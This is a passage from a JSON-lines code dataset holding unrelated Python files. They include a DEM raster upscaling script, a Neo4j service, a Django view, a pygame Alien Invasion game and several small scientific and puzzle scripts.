str(vos.getMapAttributesALL(output_file)[\"xUL\"])\ny_coordinate = str(vos.getMapAttributesALL(output_file)[\"yUL\"])\ncellsize_30sec = \"0.00833333333333333333333333333333333333333333333333333333333333333333333333333333\"\noutput_file = output_folder + \"/\" + tile_code + \".30sec.clo.map\"\ncmd = \"mapattr -s -R \" + num_of_rows_30sec + \" -C \" + num_of_cols_30sec + \" -B -P yb2t -x \" + x_coordinate + \" -y \" + y_coordinate + \" -l \" + cellsize_30sec + \" \" + output_file\nprint(cmd); os.system(cmd)\n\n\n# give the ids for every 30 arc sec cell (e.g. pcrcalc dem_tif_n60w180_30sec.ids.map = \"nominal(uniqueid(dem_tif_n60w180_30sec.clo.map))\")\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.ids.map\"\npcr.setclone(input_file)\nprint(\"Making the clone map at 30 arcsec resolution.\")\nunique_ids_30sec = pcr.nominal(pcr.uniqueid(input_file))\npcr.report(unique_ids_30sec, output_file)\n# - Note that this map has 30 arc sec resolution.\n\n\n# resample the ids map to 3 arc sec resolution (e.g. gdalwarp -tr 0.00083333333333333333333333333333333333333 0.00083333333333333333333333333333333333333 dem_tif_n60w180_30sec.ids.map dem_tif_n60w180_30sec.ids.3sec.tif\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.ids.3sec.tif\"\ncellsize_3sec = \"0.000833333333333333333333333333333333333333333333333333333333333333333333333333333\"\ncmd = \"gdalwarp -tr \" + cellsize_3sec + \" \" + cellsize_3sec + \" \" + input_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n# - This still a tif file. \n\n# convert the tif file to PCRaster map\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.ids.3sec.map\"\ncmd = 'gdal_translate -of PCRaster ' + input_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n\n# make sure that the clone of input DEM is consistent with the aforementioned clone:\nids_3sec = output_file\ndem_3sec = output_folder + \"/\" + tile_code + \".map\"\ncmd = \"mapattr -c \" + ids_3sec + \" \" + dem_3sec\nprint(cmd); os.system(cmd)\n# - check\ncmd = \"mapattr -p \" + ids_3sec + \" \" + dem_3sec\nprint(cmd); os.system(cmd)\n\n \n# do the upscaling/averaging from 3 arc second DEM to 30 arc second values:\npcr.setclone(ids_3sec)\nmsg = \"Upscaling in progress for the tile \" + tile_code\nprint(msg)\ndem_30sec = pcr.areaaverage(dem_3sec, ids_3sec)\noutput_file = output_folder + \"/\" + tile_code + \".30sec.3sec.map\"\npcr.report(dem_30sec, output_file)\n# - The cell size will be still 3 arc second.\n\n\n# then resample (using gdalwarp) to 30 arc second file:\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.tif\"\ncmd = \"gdalwarp -tr \" + cellsize_30sec + \" \" + cellsize_30sec + \" \" + input_file + \" \" + output_file \nprint(cmd); os.system(cmd)\n# - this is still a tif file\n\n# convert it to pcraster\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.map\"\ncmd = \"gdal_translate -of PCRaster \" + input_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n\n\n#~ # check (this should be deactivated while running all parallel scripts)\n#~ dem_3sec_file = dem_3sec\n#~ dem_30sec_file = output_file\n#~ cmd = \"aguila \" + dem_3sec_file + \" \" + dem_30sec_file\n#~ print(cmd); os.system(cmd)\n","sub_path":"process_merit-dem/scripts_used_by_sandra/upscale_script.py","file_name":"upscale_script.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468396099","text":"CREATE_PARENT_SENTENCE_STATEMENT = \"\"\"\n CREATE (s1:Sentence {tokens: {token_seq}})\n\"\"\"\n\nMERGE_TOKEN_STATEMENT = \"\"\"\n MERGE (t1:Token {content: {token_content}})\n\"\"\"\n\nCREATE_CONTAINS_RELATIONSHIP = \"\"\"\n MATCH (s1:Sentence {tokens: {token_seq}}), (t1:Token {content: {token_content}})\n CREATE (s1)-[:CONTAINS {relationship_properties}]->(t1);\n\"\"\"\n\nCREATE_CATEGORY_RELATIONSHIP_STATEMENT = \"\"\"\n MATCH (s1:Sentence {tokens: {token_seq}}), (t1:Taxon {name: {category}})\n CREATE (s1)-[:IN_CATEGORY]->(t1)\n\"\"\"\n\nimport misc\nimport pprint\n\nclass DataService(object):\n def __init__(self):\n pass\n\n def create_occupation_description_from_tokens(self, token_seq, category):\n result = misc.run_some_query(\n CREATE_PARENT_SENTENCE_STATEMENT, {\n 'token_seq': token_seq,\n 'category': category\n }\n )\n\n for index, value in enumerate(token_seq):\n self.merge_token(value)\n self.create_sentence_relationship(token_seq, index, value)\n\n self.create_category_relationship(token_seq, category)\n \n return result\n\n def create_category_relationship(self, token_seq, category):\n misc.run_some_query(\n CREATE_CATEGORY_RELATIONSHIP_STATEMENT, {\n 'token_seq': token_seq,\n 'category': category\n }\n )\n\n def merge_token(self, value):\n misc.run_some_query(MERGE_TOKEN_STATEMENT, {'token_content': value})\n\n def create_sentence_relationship(self, token_seq, index, value):\n rel_properties = {'index': index}\n\n if index == 0:\n rel_properties['firstToken'] = True\n elif index == len(token_seq) - 1:\n rel_properties['lastToken'] = True\n\n misc.run_some_query(\n CREATE_CONTAINS_RELATIONSHIP,\n {\n 'token_seq': token_seq,\n 'relationship_properties': rel_properties,\n 'token_content': value\n }\n )\n","sub_path":"occubrow/data_service.py","file_name":"data_service.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"93870641","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 18 17:08:27 2018\n\n@author: admin\n\"\"\"\n'''perl c:/code/mrun.pl -cmd \"c:/Users/admin/Anaconda3/python.exe c:/code/ind/group.py e:/hx/stock/csv e:/hx/ind/all e:/hx/ind/sum\" -proc 1'''\nimport pandas as pd\nimport sys\nimport matplotlib.pyplot as plt\ndts=[20180102,\n20180103,\n20180104,\n20180105,\n20180108,\n20180109,\n20180110,\n20180111,\n20180112,\n20180115,\n20180116,\n20180117,\n20180118,\n20180119,\n20180122,\n20180123,\n20180124,\n20180125,\n20180126,\n20180129,\n20180130,\n20180131]\n\ndatad=dict()\ndef corr():\n file=sys.argv[1]\n filenew=sys.argv[2]\n filedd=sys.argv[3]\n a=pd.read_csv(file,usecols=[1,2,3],header=None)\n b=a.pivot(index=2,columns=1,values=3)\n c=b.corr()\n c.to_csv(filenew)\n c.describe().T.describe().to_csv(filedd)\n#corr()\ndef loadMerge(dt):\n datad[dt]=pd.read_csv(f\"c:/hx/cppind/{dt}.csv\",index_col=0,names=['corr'])['corr']\n\n#for dt in dts:\n#\n# print(dt)\n# loadMerge(dt)\n#\n#ds=pd.DataFrame(datad)\n#tmp=ds.dropna()\n#tmean=tmp.mean(axis=1)\ncorrStock=tmean[tmean>(tmean.mean()+2*tmean.std())]\n\ncorrStock=tmean[tmean>0.7]\ncorrStock=tmean[tmean<-0.3]\nstockDict=dict()\nfor i in corrStock.index:\n sym1=i[0:9]\n sym2=i[10:19]\n if sym1 in stockDict:\n stockDict[sym1].append(sym2)\n else:\n stockDict[sym1]=[sym2]\n if sym2 in stockDict:\n stockDict[sym2].append(sym1)\n else:\n stockDict[sym2]=[sym1]\n\n'''\nconcat\npivot\nmoving window\n 20天\noutlier\n 基准为整体还是其自身前20天的数据\n'''\n","sub_path":"ind/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"58922759","text":"from django.views.generic import FormView\nfrom django.utils.functional import cached_property\nfrom django.shortcuts import redirect\nfrom django.http import Http404\n\nfrom program_manager.models import Program\n\nfrom . import utils\nfrom . import forms\n\n\nclass MapFieldsView(FormView):\n form_class = forms.MapFieldsForm\n template_name = 'field_mapper/map_fields.html'\n\n def dispatch(self, *args, **kwargs):\n program = self.program\n\n if program.status != 'CREA':\n return redirect(program.get_absolute_url())\n\n all_fields, missing_fields = utils.validate_csv(program.csv_file.file,\n program, ret=True)\n\n if not missing_fields:\n return redirect('/')\n\n self.missing_fields = missing_fields\n self.all_fields = all_fields\n\n return super(MapFieldsView, self).dispatch(*args, **kwargs)\n\n def get_form_kwargs(self):\n kwargs = super(MapFieldsView, self).get_form_kwargs()\n kwargs.update({\n 'program': self.program,\n 'all_fields': self.all_fields,\n 'missing_fields': self.missing_fields,\n })\n\n return kwargs\n\n def form_valid(self, form):\n form.save()\n\n # rewind csv_file\n self.program.csv_file.seek(0)\n\n self.program.begin()\n\n return redirect(self.program.get_absolute_url())\n\n @cached_property\n def program(self):\n try:\n program = Program.objects.get(pk=self.kwargs.get('pk'))\n except Program.DoesNotExist:\n raise Http404\n\n return program\n","sub_path":"field_mapper/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"486865081","text":"# -*- coding: utf-8 -*-\n\n\"\"\"FDC module dealing with quarter.\"\"\"\n\nimport time\nfrom string import Template\n\n\nclass Round:\n\n \"\"\"\n FDC Round allows to compute accurate timestamps for start and end of each quarter of the round.\n\n start and end timestamp are returned as a dictionnary of string { 'start': \"...\", 'end': \"...\" }\n \"\"\"\n\n QUARTER = [\n {'start': \"0101000000\", 'end': \"0331235959\"},\n {'start': \"0401000000\", 'end': \"0630235959\"},\n {'start': \"0701000000\", 'end': \"0930235959\"},\n {'start': \"1001000000\", 'end': \"1231235959\"}\n ]\n\n def __init__(self, year1, year2, round_number):\n \"\"\"Constructor.\n\n Args:\n year1 (int): Year of request of round 1\n year2 (int): Year of request of round 2\n round_number (int): FDC round number,\n either 1 for round 1 and 2 for round 2\n\n Raises:\n ValueError: if round is not 1 or 2\n \"\"\"\n self.year1 = year1\n self.year2 = year2\n if round_number in [1, 2]:\n self.round = round_number\n else:\n raise ValueError(\n \"Round number should be either 1 or 2 but is %d\" % round_number)\n\n def quarter(self, quarter):\n \"\"\"Returns the timestamp of start and end of the quarter.\n\n Args:\n quarter (int): Number of the quarter (values are between 1 and 4)\n\n Returns:\n both timestamp of start and end of the quarter as {'start': \"XXX\", 'end': \"YYY\"}\n\n Raises:\n ValueError: if quarter is not in 1..4\n \"\"\"\n year = self.year2\n index = quarter - 1\n if not quarter in range(1, 5):\n raise ValueError(\n \"quarter should be between 1 and 4 but is %d\" % quarter)\n if self.round == 2:\n index = (quarter + 1) % 4\n if quarter >= 3:\n year = self.year2 + 1\n return {\n 'start': str(year) + Round.QUARTER[index]['start'],\n 'end': str(year) + Round.QUARTER[index]['end']}\n\n def full_period(self):\n \"\"\"Returns the timestamp of start of the period and the timestamp of end of the period\n\n Returns:\n both timestamp of start and end of the period as {'start': \"XXX\", 'end': \"YYY\"}\n \"\"\"\n return {\n 'start': self.quarter(1)['start'],\n 'end': self.quarter(4)['end']\n }\n\n def _today(self):\n \"\"\"Returns timestamp of today 0000Z\"\"\"\n return time.strftime(\"%Y%m%d000000\", time.gmtime())\n\n def __repr__(self):\n return \"%s-%s round%s\" % (self.year1, self.year2, self.round)\n\n\nclass Indicator:\n\n \"\"\"Indicator for FDC reports have values for Q1, Q2, Q3, Q4 or/and a value.\n it allows to follow the evolution of an indicator during the quarters and have its final value\n or to follow an indicator with only a single value.\n \"\"\"\n\n def __init__(self, name, q1=None, q2=None, q3=None, q4=None, value=None):\n \"\"\"Constructor returns an indicator.\n it can be initilized with values for q1, q2, q3, q4 and another value (cumulative)\n\n Args:\n name (str): Unique name (can be used to refer to the indicator)\n q1 (float): Value at first quarter (optional)\n q2 (float): Value at second quarter (optional)\n q3 (float): Value at third quarter (optional)\n q4 (float): Value at fourth quarter (optional)\n value (float): A value of the indicator that has no relation to a quarter: cumulative value, fixed value, whatever (optional)\n \"\"\"\n self.name = name\n self.values = dict()\n self.values[\"q1\"] = q1\n self.values[\"q2\"] = q2\n self.values[\"q3\"] = q3\n self.values[\"q4\"] = q4\n self.values[\"value\"] = value\n\n\nclass Report:\n\n \"\"\"Report is build from indicator list and template\n and generate a report.\n \"\"\"\n\n def __init__(self, indicator_list, template_string=None, template_file=None):\n \"\"\" Initialize a report.\n\n In template variables are named:\n $name_q1, $name_q2 $name_q3, $name_q4, $name_value\n\n Args:\n indicator_list (list): list of fdc.Indicator\n template_string (str): Template string of the report to use (iff there is no template_file)\n template_file (file): File containing the template string to use to generate the report\n \"\"\"\n self.template = Template(template_string)\n self.indicator_values = dict()\n if template_string == None and template_file == None:\n raise ValueError(\n \"template_string or template_file argument needs to be used.\")\n if template_file != None:\n # reads template file\n with open(template_file, 'r') as f:\n self.template = Template(f.read())\n # fill the dictionnary of values\n for indicator in indicator_list:\n for key in indicator.values.keys():\n var_name = \"%s_%s\" % (indicator.name, key)\n if indicator.values[key]==None:\n self.indicator_values[var_name] = \"\"\n else:\n self.indicator_values[var_name] = indicator.values[key]\n\n def generate(self):\n \"\"\" Generate report from template and indicators.\n \"\"\"\n return self.template.safe_substitute(self.indicator_values)\n","sub_path":"wm_metrics/fdc.py","file_name":"fdc.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470030386","text":"import PySimpleGUI as sg\nimport analyze as an\n\n\n\ngames_categories = ['ALL','ACTION','ADVENTURE','ARCADE','BOARD','CARD','CASINO','CASUAL','EDUCATIONAL','MUSIC','PUZZLE','RACING','ROLE PLAYING','SIMULATION','SPORTS','STRATEGY','TRIVIA','WORD']\n\ndef create_layout():\n\n layout = [[sg.Text('Datos disponibles \\npara analizar', font = '_ 20', relief = sg.RELIEF_RIDGE, justification = 'center', background_color = '#6E402A')],\n [sg.Text('', background_color = '#D89156')],\n [sg.Button('Canciones de Spotify', size = (16,1), button_color = '#6E402A'), sg.Input('ALL', size = (12,1), key = 'artist')],\n [sg.Button('Juegos de Play Store', size = (16,1), button_color = '#6E402A'), sg.Combo(games_categories, size = (12,1), key = 'game_option')],\n [sg.Button('Salir', size = (6,1), button_color = '#6E402A')]]\n return sg.Window('Actividad 1 x Python Plus - TEORIA', layout, background_color = '#D89156', margins = (75,50), finalize = True)\n\n\n\ndef main():\n window = create_layout()\n \n while True: \n event, values = window.read()\n \n if event == sg.WIN_CLOSED or event == 'Salir':\n break\n\n elif event == 'Canciones de Spotify':\n if values.get('artist') != '':\n an.music_analysis(values.get('artist'))\n else:\n sg.PopupQuick('Ingrese un valor válido', background_color = '#D89156', button_color = '#6E402A')\n\n elif event == 'Juegos de Play Store':\n if values.get('game_option') in games_categories:\n an.game_analysis(values.get('game_option'))\n else:\n sg.PopupQuick('Ingrese un valor válido', background_color = '#D89156', button_color = '#6E402A')\n\n window.close()\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"actividad1-teoria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371983668","text":"'''\nGiven a binary tree, find the maximum path sum.\n\nFor this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along the parent-child connections. The path must contain at least one node and does not need to go through the root.\n\nFor example:\nGiven the below binary tree,\n\n 1\n / \\\n 2 3\nReturn 6.\n'''\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n def maxPathSum(self, root):\n (maxSum, single) = self.maxPathHelper(root)\n return maxSum\n\n def maxPathHelper(self, root):\n if root is None:\n return -sys.maxint, 0\n\n left = self.maxPathHelper(root.left)\n right = self.maxPathHelper(root.right)\n maxpath = max(left[0], right[0], root.val + left[1] + right[1])\n single = max(left[1] + root.val, right[1] + root.val, 0)\n\n return (maxpath, single)\n","sub_path":"Python/leetcode/124-BinaryTreeMaximumPathSum-FFFFF.py","file_name":"124-BinaryTreeMaximumPathSum-FFFFF.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"483145938","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 22:20:34 2020\n\n@author: luhoe\n\"\"\"\nimport json\nimport os\nfrom tqdm import tqdm\n\n# folder containing the downloaded .json files\ndata_folder = \"C:\\\\Users\\\\luhoe\\\\Documents\\\\Git_Projects\\\\Github\\\\youtube-comment-downloader\\\\Data\\\\Galileo\"\n\n\n#prepare data for word2vec\n\nmin_len = 10\nmax_len = 300\n\nwith open(data_folder + '_summary.txt', 'a') as file:\n for filename in tqdm(os.listdir(data_folder)):\n if filename.endswith(\".json\"): \n \n f = open(data_folder + '\\\\' + filename)\n data = json.load(f)\n comments = data['comments']\n\n #seperating initiial comments and answers and write comments to summary file\n for comment in comments:\n if '.' not in (comments[comment]['cid']): \n try:\n if (len(comments[comment]['text']) > min_len) and (len(comments[comment]['text']) < max_len):\n file.write(comments[comment]['text'] + '\\n')\n except:\n file.write(comments[comment]['text'].encode('ascii', 'ignore').decode('ascii'))\n else:\n isAnswer = True\n\n continue\n else:\n continue\n\n\n","sub_path":"nlp_data_cleaner.py","file_name":"nlp_data_cleaner.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"300785477","text":"import itertools\n\n\nt = int(raw_input())\n\n\ndef isprime(n):\n divisor = 5\n prime = True\n if n < 2:\n prime = False\n elif n < 4:\n prime = True\n elif n % 2 == 0 or n % 3 == 0:\n prime = False\n else:\n while n >= divisor ** 2:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n prime = False\n break\n divisor += 6\n return prime\n\n\ndef get_divisor(n):\n divisor = 2\n while divisor < n:\n if n % divisor == 0:\n break\n else:\n divisor += 1\n return divisor\n\n\nfor x in xrange(1, t + 1):\n n, j = (int(value) for value in raw_input().split())\n print(\"Case #%d:\" % x)\n jamcoins = 1\n for value in itertools.product(xrange(2), repeat=n - 2):\n if jamcoins > j:\n break\n output = \"\".join([\"1\"] + [str(hue) for hue in value] + [\"1\"])\n outputs = [output]\n is_jamcoin = True\n for base in xrange(2, 11):\n temp = long(output, base=base)\n if isprime(temp):\n is_jamcoin = False\n break\n else:\n outputs.append(get_divisor(temp))\n if is_jamcoin:\n temp = \"%s \" * 10\n print(temp % tuple(outputs))\n jamcoins += 1\n","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_nansari_2016-03.py","file_name":"16_0_3_nansari_2016-03.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"624394654","text":"# Own Library\nimport mcmc_tools\nimport analysis_data as ad\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nclass SPM(ad.AnalysisData):\n def observe_ts(self):\n sns.lineplot(x=self.data['X'], y=self.data['Y'])\n plt.show()\n plt.close()\n\n def create_data(self):\n X = self.data['X']\n Y = self.data['Y']\n N = len(Y)\n N_pred = 3\n\n return {\n 'X': X,\n 'Y': Y,\n 'N': N,\n 'N_pred': N_pred\n }\n\n def fit(self, stan_data):\n mcmc_result = mcmc_tools.sampling(self.model_file, stan_data, n_jobs=4, seed=123)\n return mcmc_result.extract()\n\n def create_figure(self, mcmc_sample):\n pred_dates = [i for i in range(len(self.data['Y']) + 3)]\n # pred_dates = np.linspace(0, len(self.data['Y']) + 3, 100)\n mcmc_tools.plot_ssm(mcmc_sample, pred_dates, '2nd diff local level'\n 'model', 'Y', 'mu_pred')\n\n\nif __name__ == '__main__':\n spm = SPM('data-ss1.txt', '../model/model12-1-2')\n spm.describe()\n\n spm.observe_ts()\n\n stan_data = spm.create_data()\n mcmc_sample = spm.fit(stan_data)\n spm.create_figure(mcmc_sample)\n\n","sub_path":"exec/12-1-2.py","file_name":"12-1-2.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"469200267","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom random import random\r\nfrom matplotlib import pyplot as plt\r\n\r\nx = list(range(1,1001))\r\nx = list(map(lambda data : str(data), x))\r\n\r\ny = [int(1000 * random()) for data in x]\r\n\r\nplt.title('Scatter example')\r\nplt.xlabel(\"x : 1 ~ 1000\")\r\nplt.ylabel(\"y : random * 1000\")\r\n\r\n#plt.plot(x, y)\r\n#plt.bar(x, y)\r\n# 스캐터 플롯 - 산점도\r\n# 값의 분포를 선이 아닌 점의 형태로 출력하는 그래프\r\n# 참고사이트\r\n# https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.scatter\r\nplt.scatter(x, y)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_08/matplotlib_15.py","file_name":"matplotlib_15.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"440330955","text":"from .module import Module\n\n\nclass Potentiometer(Module):\n possible_events = {'moved'}\n\n def __init__(self, id, alias, robot):\n Module.__init__(self, 'Potentiometer', id, alias, robot)\n self._value = 0\n\n @property\n def position(self):\n \"\"\" Position in degrees. \"\"\"\n return self._value\n\n def _update(self, new_state):\n Module._update(self, new_state)\n new_pos = new_state['position']\n\n if new_pos != self._value:\n self._value = new_pos\n self._pub_event('moved', self._value, self.position)\n","sub_path":"pyluos/modules/potentiometer.py","file_name":"potentiometer.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"335471032","text":"import sys\nfrom time import sleep\nimport pygame\nfrom settings import Settings\nfrom game_stats import GameStats\nfrom button import Button\nfrom ship import Ship\nfrom bullet import Bullet\nfrom alien import Alien\n\n\nclass AlienInvasion:\n\t# Класс для управления ресурсами и поведением игры.\n\n\tdef __init__(self):\n\t\tpygame.init()\n\t\tself.settings = Settings()\n\n\t\tself.screen = pygame.display.set_mode(\n\t\t\t(self.settings.screen_width, self.settings.screen_height))\n\t\tself.game_screen = pygame.Surface((self.settings.game_screen_width, self.settings.game_screen_height))\n\t\tself.game_screen_rect = self.game_screen.get_rect(center=(self.settings.screen_width // 2, self.settings.screen_height // 2))\n\t\tpygame.display.set_caption(\"Alien Invasion\")\n\n\t\t# Создание экземпляра для хранения игровой статистики\n\t\tself.stats = GameStats(self)\n\n\t\tself.ship = Ship(self)\n\t\tself.bullets = pygame.sprite.Group()\n\t\tself.aliens = pygame.sprite.Group()\n\n\t\tself._create_fleet()\n\t\t# Создание кнопки Play\n\t\tself.play_button = Button(self, \"Play\")\n\t\t# self.clock = pygame.time.Clock()\n\n\n\tdef run_game(self):\n\t\t# Запуск основного цикла игры\n\t\twhile True:\n\t\t\tself._check_events()\n\n\t\t\tif self.stats.game_active:\n\t\t\t\tself.ship.update()\n\t\t\t\tself._update_bullets()\n\t\t\t\tself._update_aliens()\n\n\t\t\tself._update_screen()\n\t\t\t\n\tdef _update_screen(self):\n\t\t# При каждом проходе цикла перерисовывается экран\n\t\tself.screen.fill(self.settings.bg_color)\n\t\tself.screen.blit(self.game_screen,\n\t\t\t\tself.game_screen_rect)\n\t\tself.game_screen.fill((0, 0, 150))\n\t\tself.ship.blitme()\n\t\tfor bullet in self.bullets.sprites():\n\t\t\tbullet.draw_bullet()\n\t\tself.aliens.draw(self.game_screen)\n\n\t\t# Кнопка Play отображается в том случае, если игра неактивна\n\t\tif not self.stats.game_active:\n\t\t\tself.play_button.draw_button()\n\n\t\t#self.clock.tick(self.settings.fps) попытка в частоту кадров\n\t\tself._arcade_frame()\n\n\t\t# Отображение последнего прорисованного экрана\t\t\n\t\tpygame.display.flip()\n\n\tdef _check_events(self):\n\t\t# Отслеживание событий мыши и клавиатуры\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tself._check_keydown_events(event)\n\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\tself._check_keyup_events(event)\n\t\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tmouse_pos = pygame.mouse.get_pos()\n\t\t\t\tself._check_play_button(mouse_pos)\n\n\tdef _check_play_button(self, mouse_pos):\n\t\t\"\"\"Запускает новую игру при нажатии кнопки Play\"\"\"\n\t\tbutton_clicked = self.play_button.rect.collidepoint(mouse_pos)\n\t\tif button_clicked and not self.stats.game_active:\n\t\t\t# Сброс игровой статистики\n\t\t\tself.stats.reset_stats()\n\t\t\tself.stats.game_active = True\n\n\t\t\t# ��чистка списков пришельцев и снарядов\n\t\t\tself.aliens.empty()\n\t\t\tself.bullets.empty()\n\n\t\t\t# Создание нового флота и размещение корабля в центре\n\t\t\tself._create_fleet()\n\t\t\tself.ship.center_ship()\n\n\t\t\t# Указатель мыши скрывается\n\t\t\tpygame.mouse.set_visible(False)\n\n\n\n\tdef _check_keydown_events(self, event):\n\t\t# Реагирует на нажатие клавиш\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_RIGHT:\n\t\t\t\tself.ship.moving_right = True\n\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\tself.ship.moving_left = True\n\t\t\telif event.key == pygame.K_q:\n\t\t\t\tsys.exit()\n\t\t\telif event.key == pygame.K_SPACE:\n\t\t\t\tself._fire_bullet()\n\n\tdef _check_keyup_events(self, event):\n\t\tif event.type == pygame.KEYUP:\n\t\t\tif event.key == pygame.K_RIGHT:\n\t\t\t\tself.ship.moving_right = False\n\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\tself.ship.moving_left = False\n\n\tdef _fire_bullet(self):\n\t\t# Создание нового снаряда и включение его в группу bullets.\n\t\tif len(self.bullets) < self.settings.bullets_allowed:\n\t\t\tnew_bullet = Bullet(self)\n\t\t\tself.bullets.add(new_bullet)\n\n\tdef _update_bullets(self):\n\t\t\"\"\"Обновляет позиции снарядов и уничтожает старые снаряды\"\"\"\t\t\n\t\t# Обновление позиций снарядов.\n\t\tself.bullets.update()\n\n\t\t# Удаление снарядов, вышедших за край экрана.\n\t\tfor bullet in self.bullets.copy():\n\t\t\tif bullet.rect.bottom <= 0:\n\t\t\t\tself.bullets.remove(bullet)\n\n\t\tself._check_bullet_alien_collisions()\n\n\n\tdef _check_bullet_alien_collisions(self):\n\t\t\"\"\"Обработка коллизий снарядов с пришельцами\"\"\"\n\t\t# Удаление снарядов и пришельцев, учавствующих в коллизиях\n\t\tcollisions = pygame.sprite.groupcollide(\n\t\t\tself.bullets, self.aliens, True, True)\n\n\t\tif not self.aliens:\n\t\t\t# Уничтожение существующих снарядов и создание нового флота\n\t\t\tself.bullets.empty()\n\t\t\tself._create_fleet()\n\n\tdef _ship_hit(self):\n\t\t\"\"\"Обрабатывает столкновение корябля с пришельцем\"\"\"\n\t\tif self.stats.ships_left > 0:\n\t\t\t# Уменьшение ship_left\n\t\t\tself.stats.ships_left -= 1\n\n\t\t\t# Очистка списков пришельцев и снарядов\n\t\t\tself.aliens.empty()\n\t\t\tself.bullets.empty()\n\n\t\t\t# Создание нового флота и размещение корабля в центре\n\t\t\tself._create_fleet()\n\t\t\tself.ship.center_ship()\n\n\t\t\t# Пауза\n\t\t\tsleep(0.5)\n\t\telse:\n\t\t\tself.stats.game_active = False\n\n\n\tdef _create_fleet(self):\n\t\t\"\"\"Создание флота вторжения\"\"\"\n\t\t# Создание пришельца и вычисление количества пришельцев в ряду\n\t\t# Интервал между соседними пришельцами равен ширине пришельца\n\t\talien = Alien(self)\n\t\talien_width, alien_height = alien.rect.size\n\t\tavailible_space_x = self.settings.game_screen_width - (2 * alien_width)\n\t\tnumber_aliens_x = availible_space_x // (2 * alien_width)\n\n\t\t\"\"\"Определяет количество рядов, помещающихся на экране\"\"\"\n\t\tship_height = self.ship.rect.height\n\t\tavailible_space_y = (self.settings.game_screen_height - \n\t\t\t\t\t\t\t\t(3 * alien_height) - ship_height)\n\t\tnumber_rows = 5\n\n\t\t# Создание флота вторжения\n\t\tfor row_number in range(number_rows):\n\t\t\tfor alien_number in range(number_aliens_x):\n\t\t\t\tself._create_alien(alien_number, row_number)\n\n\tdef _check_fleet_edges(self):\n\t\t\"\"\"Реагирует на достижение пришельцем края экрана\"\"\"\n\t\tfor alien in self.aliens.sprites():\n\t\t\tif alien.check_edges():\n\t\t\t\tself._change_fleet_direction()\n\t\t\t\tbreak\n\n\tdef _change_fleet_direction(self):\n\t\t\"\"\"Опускает весь флот и меняет направление флота\"\"\"\n\t\tfor alien in self.aliens.sprites():\n\t\t\talien.rect.y += self.settings.fleet_drop_speed\n\t\tself.settings.fleet_direction *= -1\n\n\tdef _create_alien(self, alien_number, row_number):\n\t\t\"\"\"Создание пришельца и размещение его в ряду\"\"\"\n\t\talien = Alien(self)\n\t\talien_width, alien_height = alien.rect.size\n\t\talien.x = alien_width + 2 * alien_width * alien_number\n\t\talien.rect.x = alien.x\n\t\talien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n\t\tself.aliens.add(alien)\n\n\tdef _check_aliens_bottom(self):\n\t\t\"\"\"Проверяет, добрались ли пришельцы до нижнего края экрана\"\"\"\n\t\tscreen_rect = self.game_screen.get_rect()\n\t\tfor alien in self.aliens.sprites():\n\t\t\tif alien.rect.bottom >= screen_rect.bottom:\n\t\t\t\t# 